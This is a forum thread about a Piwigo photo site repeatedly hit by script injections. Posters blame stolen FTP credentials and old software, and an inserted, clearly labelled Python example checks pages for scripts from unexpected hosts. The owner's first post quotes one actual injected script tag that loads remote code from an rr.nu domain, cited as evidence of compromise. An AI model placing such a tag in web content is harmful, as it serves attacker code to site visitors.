My site (kozpics.com) has been hacked three times in two months. Google warns me of script injections. I've cleaned it, reinstalled it, upgraded passwords, etc. I am now waiting for Google to review the site to confirm it's clean.
I want to know how this happens and what I can do to prevent it.
Google Webmaster Tools tells me there was malicious content on 93 pages on the site. They are script injections (such as <script src="http://stigat67ionsfor.rr.nu/nl.php?p=d">). The injections are all different but they are all from rr.nu. The injections are into picture pages (http://www.kozpics.com/picture.php?/2501/categories) and (http://www.kozpics.com/picture.php?/229).
I'm totally naive about web site structure. Any leads would be appreciated.
On a side note, I entered the infected pages regardless of the warning. Then I scanned my machine with several malware screeners. They found nothing.
Thanks / Kozmo
For me the only entry point is your FTP: if somehow the hacker managed to get access to it (weak password, etc.), he modified your files and added his JavaScript.
There is no known security breach in Piwigo itself, nor in plugins.
Hmmm, I do think the above depends on the Piwigo version the topic starter is using and whether he/she has deleted install.php ...
See the list of vulnerabilities:
http://www.cvedetails.com/vulnerability … iwigo.html
We do know the CVEs related to Piwigo, and the worst were related to a Windows environment.
But unfortunately the cause is usually theft of FTP credentials.
To prevent any hacking, the basic rules are to keep your software updated (for Piwigo, register for the newsletter) and use a strong and unique FTP password.
Thanks all. I thought I had this cleaned up but Google tells me it's still infected. I'll start a new thread for advice on getting it clean. Version loaded is 2.5.1. I've deleted all FTP accounts. I have a strong and unique password.
aardbei wonders if I've deleted install.php. I don't understand the table of CVE details but I see there's access through this file in ver 2.4.7. Should I do something with the install.php using ver 2.5.1?
That bug has been corrected in 2.4.7: it appears only if you were running Windows on your server.
Your website is clean.
You might speed things up if you have a Google Webmaster account.
Thanks flop25.
You say the website is clean. I still get the Google warning when I go to the site (kozpics.com) and their most recent review of the site tells me it's infected. How do you think it's clean?
Oh, and I do have a Google Webmaster account.
Google is a heavy system with a lot of inertia! I say it's safe, because I checked the source and there is only Google Analytics as a "foreign" script.
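The source check described in the post above (looking for scripts loaded from hosts other than the site's own), as an added example that is not part of the original thread. The allowlist, the function names, the sample page and its theme script path are assumptions constructed for illustration; the injected tag is the one quoted in the first post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: the only hosts this site intentionally loads scripts from.
ALLOWED_HOSTS = {"kozpics.com", "www.kozpics.com", "www.google-analytics.com"}


class SrcCollector(HTMLParser):
    """Collect the src attribute of every <script> and <iframe> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def foreign_scripts(html, page_url, allowed_hosts=ALLOWED_HOSTS):
    """Return sorted (host, url) pairs loaded from hosts not on the allowlist."""
    collector = SrcCollector()
    collector.feed(html)
    found = set()
    for src in collector.sources:
        absolute = urljoin(page_url, src)  # resolves relative and //host/ forms
        host = (urlsplit(absolute).hostname or "").lower()
        if host and host not in allowed_hosts:
            found.add((host, absolute))
    return sorted(found)


# Constructed sample page; the injected tag is the one quoted in the first post.
SAMPLE_PAGE = """<html><head>
<script src="themes/default/js/example.js"></script>
<script src="http://www.google-analytics.com/ga.js"></script>
</head><body>
<img src="http://other.example/photo.jpg">
<script src="http://stigat67ionsfor.rr.nu/nl.php?p=d"></script>
</body></html>"""

if __name__ == "__main__":
    page = "http://www.kozpics.com/picture.php?/229"
    for host, url in foreign_scripts(SAMPLE_PAGE, page):
        print(f"unexpected script host {host}: {url}")
```

The check only sees script and iframe tags present in the HTML it is given, so it is worth running over both the template files on disk and the pages as the server actually delivers them.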
OK, thanks. I guess the next thing to do is to ask Google to review it again. Will do that.